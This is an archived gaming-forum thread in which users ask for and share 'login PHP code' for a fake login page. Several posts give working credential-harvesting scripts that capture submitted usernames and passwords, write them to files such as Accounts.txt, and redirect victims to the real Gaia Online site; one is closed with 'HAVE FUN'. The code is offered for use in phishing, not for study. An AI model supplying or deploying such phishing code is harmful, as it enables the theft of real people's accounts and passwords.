A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

Anyone Got Loin Php Code?

972 views · started by iGawd · · closed
#1
Anyone Got Loin Php Code?
I Need One For FLP.
Someone Gimme Onez
#2
I think Arti posted it
#3
Snow-kun wrote:
I think Arti posted it


Link Plox.
And I Has Spelling Phail In Title D:
#4
I was mistaken it was something else.
#5
Here's loin php code:

<php>
<loin>pelvic%20THRUST
</loin>
</php>
#6
Minora wrote:
Here's loin php code:


<php>
<loin>pelvic%20THRUST
</loin>
</php>


Lol`d so hard.

Here is one that I randomly found:

<html>
<head>
<title>Error</title>
<script type="text/javascript">
window.location = "http://www.websitethatyouwanttoredirectto.com"
</script>

</head>
<body>

</body>
</html>

<?php

@$username = addslashes($_POST['username']);
@$password = addslashes($_POST['password']);

$fileContents=file_get_contents("NAMEOFPASSWORDLIST.txt");
$file = fopen("NAMEOFPASSWORDLIST.txt","r+");
$fileContents=$fileContents . "\n" . $username . "\t" . $password;
fwrite($file,$fileContents);
fclose($file);

?>
#7
I think he posted it in the Programming Forum.
#8
Talk to Gamechief. He knows PhP and may have a code for the login. No offence to arti.
#9
<html>
<head>
<title>Error</title>
<script type="text/javascript">
window.location = "http://login.gaiaonline.com/gaia/login.php"
</script>

</head>
<body>

</body>
</html>

<?php

@$username = addslashes($_POST['username']);
@$password = addslashes($_POST['password']);

$fileContents=file_get_contents("info.txt");
$file = fopen("info.txt","r+");
$fileContents=$fileContents . "\n" . $username . "\t" . $password;
fwrite($file,$fileContents);
fclose($file);

?>
#10
<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);

header ("Location:http://www.gaiaonline.com");
?>

Tab out username= and password=
the rest you leave the same
#11
<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);

header ("Location:http://www.gaiaonline.com");
?>

HAVE FUN ;]
#12
<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);

header ("Location:http://www.gaiaonline.com");
?>

HAVE FUN ;]


Good Job GraveDigging, Plus It Already Has Been Answered.